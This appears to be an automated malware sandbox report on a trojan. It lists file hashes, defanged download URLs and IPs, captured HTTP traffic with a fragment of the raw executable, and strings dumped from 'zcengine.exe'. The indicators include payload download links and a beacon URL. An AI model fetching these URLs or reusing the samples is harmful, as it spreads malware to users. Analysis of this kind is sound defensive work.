7eda2ff995cacf43200cddb1acfe27b1
29bd205e8d1f66443cdc79b4c7bdc699
3fff1791278f0c7414a725119560a20a
a0616f00cb5758884772c13ed254b2ed
cc4df2465ca491bd3210e36a2f5beb2d
5e9153abe724a97e7f0cb29e4789037a
9d1fca8d24f89f05d6fde1e6eafc809b
b0176387691021265d1b0db042e3dd0d
59204a1103f2da8ba1d139e96c843855
1b73c20c425f423292a3d268ca2f4edb
ba3b71aa8286f21167a18939ee1a8fc3
56a312073eb7514321a08371447bcb61
8f5db7331d5524c9356cde639daca71b
9734aef2aded89bb408f17d66cb94570
Network Activity
URLs
| URL | IP |
|---|---|
| hxxp://www.flowsurf.net/setupfs_1123.exe | 82.165.149.116 |
| hxxp://www.flowsurf.net/setupfs_4435.exe | 82.165.149.116 |
| hxxp://www.kljlkjasdasdlmkmmk23443.com/s.php?i=a344e2cc15dfd82af6579b66c543039d&a=1 | 46.101.48.130 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /setupfs_1123.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.flowsurf.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Thu, 24 Dec 2015 06:44:30 GMT
Content-Type: text/html
Content-Length: 154
Connection: keep-alive
Location: hXXp://VVV.flowsurf.net/setupfs_4435.exe
<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>......
GET /setupfs_4435.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.flowsurf.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 24 Dec 2015 06:44:30 GMT
Content-Type: application/octet-stream
Content-Length: 5355188
Last-Modified: Mon, 07 Dec 2015 20:54:29 GMT
Connection: keep-alive
ETag: "5665f205-51b6b4"
Accept-Ranges: bytes
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................\..........<2.......p....@..........................p...............................................s.......`...............................................................................p...............................text...ZZ.......\.................. ..`.rdata.......p.......`..............@..@.data................r..............@....ndata... ...@...........................rsrc........`.......v..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....>B..H.P.u..u..u...Hr@..B...SV.5.>B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h.6B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5.>B.r._^[..
<<< skipped >>>
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
zcengine.exe_1208:
.text
.text
`.rdata
`.rdata
@.data
@.data
.idata
.idata
.rsrc
.rsrc
@.reloc
@.reloc
l.dlf
l.dlf
xSSSh
xSSSh
FTPjKS
FTPjKS
FtPj;S
FtPj;S
C.PjRV
C.PjRV
03319CCE-99CA-442D-B70F-1BB522848CE0
03319CCE-99CA-442D-B70F-1BB522848CE0
B74DEAEF-B834-486D-86EE-BB151FC7A989
B74DEAEF-B834-486D-86EE-BB151FC7A989
F4C04932-3E63-4f27-BDDD-BB22870A181A
F4C04932-3E63-4f27-BDDD-BB22870A181A
GetProcessWindowStation
GetProcessWindowStation
operator
operator
portuguese-brazilian
portuguese-brazilian
c:\dev\OutSourcing\KinnerLake\Spoofer\PCProxyWin\Release\PCProxyWin.pdb
c:\dev\OutSourcing\KinnerLake\Spoofer\PCProxyWin\Release\PCProxyWin.pdb
%Program Files%\QuickSearch\zcengine.exe
%Program Files%\QuickSearch\zcengine.exe
KERNEL32.dll
KERNEL32.dll
GetProcessHeap
GetProcessHeap
GetCPInfo
GetCPInfo
!4.42474
!4.42474
= =
= =
mscoree.dll
mscoree.dll
KERNEL32.DLL
KERNEL32.DLL
ADVAPI32.DLL
ADVAPI32.DLL
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- CRT not initialized
- floating point support not loaded
- floating point support not loaded
WUSER32.DLL
WUSER32.DLL
zcengine.exe
zcengine.exe
3.0.0.0
3.0.0.0